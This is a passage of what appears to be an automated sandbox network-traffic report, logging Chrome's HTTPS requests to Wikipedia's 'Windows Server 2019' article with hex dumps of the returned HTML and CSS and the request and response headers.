                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC3128INData Raw: 46 25 45 30 25 41 34 25 38 32 25 45 30 25 41 34 25 41 31 25 45 30 25 41 35 25 38 42 25 45 30 25 41 34 25 39 43 25 45 30 25 41 34 25 42 43 5f 25 45 30 25 41 34 25 42 38 25 45 30 25 41 34 25 42 30 25 45 30 25 41 35 25 38 44 25 45 30 25 41 34 25 42 35 25 45 30 25 41 34 25 42 30 5f 25 45 30 25 41 35 25 41 38 25 45 30 25 41 35 25 41 36 25 45 30 25 41 35 25 41 37 25 45 30 25 41 35 25 41 46 22 20 74 69 74 6c 65 3d 22 e0 a4 b5 e0 a4 bf e0 a4 82 e0 a4 a1 e0 a5 8b e0 a4 9c e0 a4 bc 20 e0 a4 b8 e0 a4 b0 e0 a5 8d e0 a4 b5 e0 a4 b0 20 e0 a5 a8 e0 a5 a6 e0 a5 a7 e0 a5 af 20 e2 80 93 20 48 69 6e 64 69 22 20 6c 61 6e 67 3d 22 68 69 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 69 22 20 64 61 74 61 2d 74 69 74 6c 65 3d 22 e0 a4 b5 e0 a4 bf e0 a4 82 e0 a4 a1 e0 a5 8b e0 a4 9c e0
                                                                                                                                                                                                                                      Data Ascii: F%E0%A4%82%E0%A4%A1%E0%A5%8B%E0%A4%9C%E0%A4%BC_%E0%A4%B8%E0%A4%B0%E0%A5%8D%E0%A4%B5%E0%A4%B0_%E0%A5%A8%E0%A5%A6%E0%A5%A7%E0%A5%AF" title=" Hindi" lang="hi" hreflang="hi" data-title="
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 64 61 74 61 2d 74 69 74 6c 65 3d 22 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 30 31 39 22 20 64 61 74 61 2d 6c 61 6e 67 75 61 67 65 2d 61 75 74 6f 6e 79 6d 3d 22 50 6f 6c 73 6b 69 22 20 64 61 74 61 2d 6c 61 6e 67 75 61 67 65 2d 6c 6f 63 61 6c 2d 6e 61 6d 65 3d 22 50 6f 6c 69 73 68 22 20 63 6c 61 73 73 3d 22 69 6e 74 65 72 6c 61 6e 67 75 61 67 65 2d 6c 69 6e 6b 2d 74 61 72 67 65 74 22 3e 3c 73 70 61 6e 3e 50 6f 6c 73 6b 69 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 69 6e 74 65 72 6c 61 6e 67 75 61 67 65 2d 6c 69 6e 6b 20 69 6e 74 65 72 77 69 6b 69 2d 70 74 20 6d 77 2d 6c 69 73 74 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69
                                                                                                                                                                                                                                      Data Ascii: data-title="Windows Server 2019" data-language-autonym="Polski" data-language-local-name="Polish" class="interlanguage-link-target"><span>Polski</span></a></li><li class="interlanguage-link interwiki-pt mw-list-item"><a href="https://pt.wikipedia.org/wiki
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 72 76 65 72 5f 32 30 31 39 5f 64 65 73 6b 74 6f 70 5f 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6d 77 2d 66 69 6c 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 75 70 6c 6f 61 64 2e 77 69 6b 69 6d 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 70 65 64 69 61 2f 65 6e 2f 74 68 75 6d 62 2f 65 2f 65 64 2f 57 69 6e 64 6f 77 73 5f 53 65 72 76 65 72 5f 32 30 31 39 5f 64 65 73 6b 74 6f 70 5f 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 2f 33 30 30 70 78 2d 57 69 6e 64 6f 77 73 5f 53 65 72 76 65 72 5f 32 30 31 39 5f 64 65 73 6b 74 6f 70 5f 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 32 32 35 22 20 63
                                                                                                                                                                                                                                      Data Ascii: rver_2019_desktop_screenshot.png" class="mw-file-description"><img src="//upload.wikimedia.org/wikipedia/en/thumb/e/ed/Windows_Server_2019_desktop_screenshot.png/300px-Windows_Server_2019_desktop_screenshot.png" decoding="async" width="300" height="225" c
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC128INData Raw: 22 6d 77 2d 64 61 74 61 3a 54 65 6d 70 6c 61 74 65 53 74 79 6c 65 73 3a 72 31 31 32 39 36 39 33 33 37 34 22 3e 3c 73 74 79 6c 65 20 64 61 74 61 2d 6d 77 2d 64 65 64 75 70 6c 69 63 61 74 65 3d 22 54 65 6d 70 6c 61 74 65 53 74 79 6c 65 73 3a 72 31 32 33 39 34 30 30 32 33 31 22 3e 2e 6d 77 2d 70 61 72 73 65 72 2d 6f 75 74 70 75 74 20 2e 6e 61 76 62 61 72 7b 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                      Data Ascii: "mw-data:TemplateStyles:r1129693374"><style data-mw-deduplicate="TemplateStyles:r1239400231">.mw-parser-output .navbar{display:i
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 6e 6c 69 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 38 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 2e 6d 77 2d 70 61 72 73 65 72 2d 6f 75 74 70 75 74 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 6d 77 2d 70 61 72 73 65 72 2d 6f 75 74 70 75 74 20 2e 6e 61 76 62 61 72 2d 62 6f 78 74 65 78 74 7b 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 30 7d 2e 6d 77 2d 70 61 72 73 65 72 2d 6f 75 74 70 75 74 20 2e 6e 61 76 62 61 72 20 75 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 6d 77 2d 70 61 72 73 65 72 2d 6f 75 74 70 75
                                                                                                                                                                                                                                      Data Ascii: nline;font-size:88%;font-weight:normal}.mw-parser-output .navbar-collapse{float:left;text-align:left}.mw-parser-output .navbar-boxtext{word-spacing:0}.mw-parser-output .navbar ul{display:inline-block;white-space:nowrap;line-height:inherit}.mw-parser-outpu
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 6b 65 76 25 33 41 6d 74 78 25 33 41 6a 6f 75 72 6e 61 6c 26 61 6d 70 3b 72 66 74 2e 67 65 6e 72 65 3d 75 6e 6b 6e 6f 77 6e 26 61 6d 70 3b 72 66 74 2e 6a 74 69 74 6c 65 3d 4d 69 63 72 6f 73 6f 66 74 2b 53 75 70 70 6f 72 74 26 61 6d 70 3b 72 66 74 2e 61 74 69 74 6c 65 3d 44 65 63 65 6d 62 65 72 2b 31 30 25 32 43 2b 32 30 32 34 25 45 32 25 38 30 25 39 34 4b 42 35 30 34 38 36 36 31 2b 25 32 38 4f 53 2b 42 75 69 6c 64 2b 31 37 37 36 33 2e 36 36 35 39 25 32 39 26 61 6d 70 3b 72 66 74 5f 69 64 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 25 32 46 68 65 6c 70 25 32 46 35 30 34 38 36 36 31 26 61 6d 70 3b 72 66 72 5f 69 64 3d 69 6e 66 6f 25 33 41 73 69 64 25 32 46 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e
                                                                                                                                                                                                                                      Data Ascii: kev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=Microsoft+Support&amp;rft.atitle=December+10%2C+2024%E2%80%94KB5048661+%28OS+Build+17763.6659%29&amp;rft_id=https%3A%2F%2Fsupport.microsoft.com%2Fhelp%2F5048661&amp;rfr_id=info%3Asid%2Fen.wikipedia.
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC128INData Raw: 74 79 6c 65 73 3a 72 31 32 33 38 32 31 38 32 32 32 22 3e 3c 63 69 74 65 20 69 64 3d 22 43 49 54 45 52 45 46 66 72 61 6e 6b 72 6f 6a 32 30 32 33 22 20 63 6c 61 73 73 3d 22 63 69 74 61 74 69 6f 6e 20 77 65 62 20 63 73 31 22 3e 66 72 61 6e 6b 72 6f 6a 20 28 46 65 62 72 75 61 72 79 20 32 38 2c 20 32 30 32 33 29 2e 20 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 63 6c 61 73 73
                                                                                                                                                                                                                                      Data Ascii: tyles:r1238218222"><cite id="CITEREFfrankroj2023" class="citation web cs1">frankroj (February 28, 2023). <a rel="nofollow" class
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 3d 22 65 78 74 65 72 6e 61 6c 20 74 65 78 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 65 61 72 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 6e 2d 75 73 2f 77 69 6e 64 6f 77 73 2f 64 65 70 6c 6f 79 6d 65 6e 74 2f 75 70 67 72 61 64 65 2f 73 65 74 75 70 64 69 61 67 22 3e 22 53 65 74 75 70 44 69 61 67 20 2d 20 57 69 6e 64 6f 77 73 20 44 65 70 6c 6f 79 6d 65 6e 74 22 3c 2f 61 3e 2e 20 3c 69 3e 6c 65 61 72 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 3c 2f 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 65 66 65 72 65 6e 63 65 2d 61 63 63 65 73 73 64 61 74 65 22 3e 2e 20 52 65 74 72 69 65 76 65 64 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 6f 77 72 61 70 22 3e 4a 75 6e 65 20 35 2c 3c 2f 73 70 61 6e 3e 20 32 30 32 33 3c 2f 73 70 61 6e 3e 2e 3c
                                                                                                                                                                                                                                      Data Ascii: ="external text" href="https://learn.microsoft.com/en-us/windows/deployment/upgrade/setupdiag">"SetupDiag - Windows Deployment"</a>. <i>learn.microsoft.com</i><span class="reference-accessdate">. Retrieved <span class="nowrap">June 5,</span> 2023</span>.<


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      33192.168.2.1649757185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC1020OUTGET /w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC951INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:49:24 GMT
                                                                                                                                                                                                                                      etag: W/"sa752"
                                                                                                                                                                                                                                      expires: Tue, 07 Jan 2025 17:54:23 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=300, s-maxage=300, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: text/css; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/2410
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 182902
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC13845INData Raw: 2e 6d 77 2d 63 69 74 65 2d 62 61 63 6b 6c 69 6e 6b 2c 2e 63 69 74 65 2d 61 63 63 65 73 73 69 62 69 6c 69 74 79 2d 6c 61 62 65 6c 7b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 6d 77 2d 72 65 66 65 72 65 6e 63 65 73 2d 63 6f 6c 75 6d 6e 73 7b 2d 6d 6f 7a 2d 63 6f 6c 75 6d 6e 2d 77 69 64 74 68 3a 33 30 65 6d 3b 63 6f 6c 75 6d 6e 2d 77 69 64 74 68 3a 33 30 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 2e 33 65 6d 7d 2e 6d 77 2d 70 61 72 73 65 72 2d 6f 75 74 70 75 74 20 2e 6d 77 2d 72 65 66 65 72 65 6e 63 65 73 2d 63 6f 6c 75 6d 6e 73 20 2e 72 65 66 65 72 65 6e 63 65 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d
                                                                                                                                                                                                                                      Data Ascii: .mw-cite-backlink,.cite-accessibility-label{-webkit-user-select:none;-moz-user-select:none;user-select:none}.mw-references-columns{-moz-column-width:30em;column-width:30em;margin-top:0.3em}.mw-parser-output .mw-references-columns .references{margin-top:0}
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 6e 2d 74 68 65 6d 65 2d 63 6c 69 65 6e 74 70 72 65 66 2d 6f 73 20 2e 6e 61 76 69 67 61 74 69 6f 6e 2d 62 6f 78 3a 6e 6f 74 28 2e 6e 6f 74 68 65 6d 65 29 2c 68 74 6d 6c 2e 73 6b 69 6e 2d 74 68 65 6d 65 2d 63 6c 69 65 6e 74 70 72 65 66 2d 6f 73 20 2e 6d 65 74 61 64 61 74 61 3a 6e 6f 74 28 2e 6e 6f 74 68 65 6d 65 29 2c 68 74 6d 6c 2e 73 6b 69 6e 2d 74 68 65 6d 65 2d 63 6c 69 65 6e 74 70 72 65 66 2d 6f 73 20 2e 71 75 6f 74 65 62 6f 78 3a 6e 6f 74 28 2e 6e 6f 74 68 65 6d 65 29 2c 68 74 6d 6c 2e 73 6b 69 6e 2d 74 68 65 6d 65 2d 63 6c 69 65 6e 74 70 72 65 66 2d 6f 73 20 2e 73 69 64 65 2d 62 6f 78 3a 6e 6f 74 28 2e 6e 6f 74 68 65 6d 65 29 2c 68 74 6d 6c 2e 73 6b 69 6e 2d 74 68 65 6d 65 2d 63 6c 69 65 6e 74 70 72 65 66 2d 6f 73 20 2e 73 69 64 65 2d 62 6f 78 20 64
                                                                                                                                                                                                                                      Data Ascii: n-theme-clientpref-os .navigation-box:not(.notheme),html.skin-theme-clientpref-os .metadata:not(.notheme),html.skin-theme-clientpref-os .quotebox:not(.notheme),html.skin-theme-clientpref-os .side-box:not(.notheme),html.skin-theme-clientpref-os .side-box d
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC2603INData Raw: 2d 70 72 6f 67 72 65 73 73 69 76 65 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 2f 6c 6f 61 64 2e 70 68 70 3f 6d 6f 64 75 6c 65 73 3d 73 6b 69 6e 73 2e 76 65 63 74 6f 72 2e 69 63 6f 6e 73 26 69 6d 61 67 65 3d 65 6c 6c 69 70 73 69 73 26 76 61 72 69 61 6e 74 3d 70 72 6f 67 72 65 73 73 69 76 65 26 66 6f 72 6d 61 74 3d 6f 72 69 67 69 6e 61 6c 26 6c 61 6e 67 3d 65 6e 26 73 6b 69 6e 3d 76 65 63 74 6f 72 2d 32 30 32 32 26 76 65 72 73 69 6f 6e 3d 31 31 63 32 33 29 3b 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 2f 6c 6f 61 64 2e 70 68 70 3f 6d 6f 64 75 6c 65 73 3d 73 6b 69 6e 73 2e
                                                                                                                                                                                                                                      Data Ascii: -progressive{-webkit-mask-image:url(https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=ellipsis&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23);mask-image:url(https://en.wikipedia.org/w/load.php?modules=skins.
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 6b 69 6d 65 64 69 61 2d 6c 6f 67 4f 75 74 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 2f 6c 6f 61 64 2e 70 68 70 3f 6d 6f 64 75 6c 65 73 3d 73 6b 69 6e 73 2e 76 65 63 74 6f 72 2e 69 63 6f 6e 73 26 69 6d 61 67 65 3d 6c 6f 67 4f 75 74 26 66 6f 72 6d 61 74 3d 6f 72 69 67 69 6e 61 6c 26 6c 61 6e 67 3d 65 6e 26 73 6b 69 6e 3d 76 65 63 74 6f 72 2d 32 30 32 32 26 76 65 72 73 69 6f 6e 3d 31 31 63 32 33 29 3b 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 2f 6c 6f 61 64 2e 70 68 70 3f 6d 6f 64 75 6c 65 73 3d 73 6b 69 6e 73 2e 76 65 63 74 6f 72 2e 69 63 6f 6e 73 26 69 6d 61 67 65 3d 6c
                                                                                                                                                                                                                                      Data Ascii: kimedia-logOut{-webkit-mask-image:url(https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=logOut&format=original&lang=en&skin=vector-2022&version=11c23);mask-image:url(https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=l
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 74 63 68 6c 69 73 74 2d 69 6e 76 65 72 74 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 2f 6c 6f 61 64 2e 70 68 70 3f 6d 6f 64 75 6c 65 73 3d 73 6b 69 6e 73 2e 76 65 63 74 6f 72 2e 69 63 6f 6e 73 26 69 6d 61 67 65 3d 77 61 74 63 68 6c 69 73 74 26 76 61 72 69 61 6e 74 3d 69 6e 76 65 72 74 26 66 6f 72 6d 61 74 3d 6f 72 69 67 69 6e 61 6c 26 6c 61 6e 67 3d 65 6e 26 73 6b 69 6e 3d 76 65 63 74 6f 72 2d 32 30 32 32 26 76 65 72 73 69 6f 6e 3d 31 31 63 32 33 29 3b 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 2f 6c 6f 61 64 2e 70 68 70 3f 6d 6f 64 75 6c 65 73 3d 73 6b 69 6e 73 2e 76 65
                                                                                                                                                                                                                                      Data Ascii: tchlist-invert{-webkit-mask-image:url(https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=watchlist&variant=invert&format=original&lang=en&skin=vector-2022&version=11c23);mask-image:url(https://en.wikipedia.org/w/load.php?modules=skins.ve
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC128INData Raw: 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 61 6e 70 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 61 73 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 61 77 61 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 67 63 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 68 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 68
                                                                                                                                                                                                                                      Data Ascii: eading1:lang(anp),.mw-heading1:lang(as),.mw-heading1:lang(awa),.mw-heading1:lang(bgc),.mw-heading1:lang(bh),.mw-heading1:lang(bh
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 6f 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 6c 6b 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 6e 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 6f 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 62 70 79 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 63 63 70 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 64 74 79 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 64 7a 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 67 6f 6d 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 67 75 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 68 69 29 2c 2e 6d 77 2d 68 65 61 64 69 6e 67 31 3a 6c 61 6e 67 28 6b 6a 70 29 2c 2e 6d 77 2d
                                                                                                                                                                                                                                      Data Ascii: o),.mw-heading1:lang(blk),.mw-heading1:lang(bn),.mw-heading1:lang(bo),.mw-heading1:lang(bpy),.mw-heading1:lang(ccp),.mw-heading1:lang(dty),.mw-heading1:lang(dz),.mw-heading1:lang(gom),.mw-heading1:lang(gu),.mw-heading1:lang(hi),.mw-heading1:lang(kjp),.mw-
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 72 6f 67 72 65 73 73 69 76 65 2d 2d 66 6f 63 75 73 3a 23 36 34 38 35 64 31 3b 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 64 65 73 74 72 75 63 74 69 76 65 2d 2d 68 6f 76 65 72 3a 23 66 64 37 38 36 35 3b 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 64 65 73 74 72 75 63 74 69 76 65 2d 2d 61 63 74 69 76 65 3a 23 66 65 61 38 39 38 3b 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 64 65 73 74 72 75 63 74 69 76 65 2d 2d 66 6f 63 75 73 3a 23 36 34 38 35 64 31 3b 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 2d 2d 68 6f 76 65 72 3a 23 66 64 37 38 36 35 3b 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 2d 2d 61 63 74 69 76 65 3a 23 66 65 61 38 39 38 3b 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 63 6f 6e 74 65 6e 74 2d 61 64 64 65 64 3a
                                                                                                                                                                                                                                      Data Ascii: rogressive--focus:#6485d1;--border-color-destructive--hover:#fd7865;--border-color-destructive--active:#fea898;--border-color-destructive--focus:#6485d1;--border-color-error--hover:#fd7865;--border-color-error--active:#fea898;--border-color-content-added:
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC128INData Raw: 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 6d 61 73 6b 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 28 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 20 6f 72 20 28 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 29 7b 2e 76 65 63 74
                                                                                                                                                                                                                                      Data Ascii: o-repeat;-webkit-mask-position:center;mask-position:center}}@supports not ((-webkit-mask-image:none) or (mask-image:none)){.vect
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 6f 72 2d 64 72 6f 70 64 6f 77 6e 20 2e 76 65 63 74 6f 72 2d 64 72 6f 70 64 6f 77 6e 2d 6c 61 62 65 6c 3a 6e 6f 74 28 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 69 63 6f 6e 2d 6f 6e 6c 79 29 3a 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 75 74 66 38 2c 3c 73 76 67 20 78 6d 6c 6e 73 3d 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 5c 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 5c 22 20 77 69 64 74 68 3d 5c 22 32 30 5c 22 20 68 65 69 67 68 74 3d 5c 22 32 30 5c 22 20 76 69 65 77 42 6f 78 3d 5c 22 30 20 30 20 32 30 20 32 30 5c 22 20 66 69 6c
                                                                                                                                                                                                                                      Data Ascii: or-dropdown .vector-dropdown-label:not(.cdx-button--icon-only)::after{background-image:url("data:image/svg+xml;utf8,<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"20\" height=\"20\" viewBox=\"0 0 20 20\" fil


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      34192.168.2.1649761185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC770OUTGET /w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
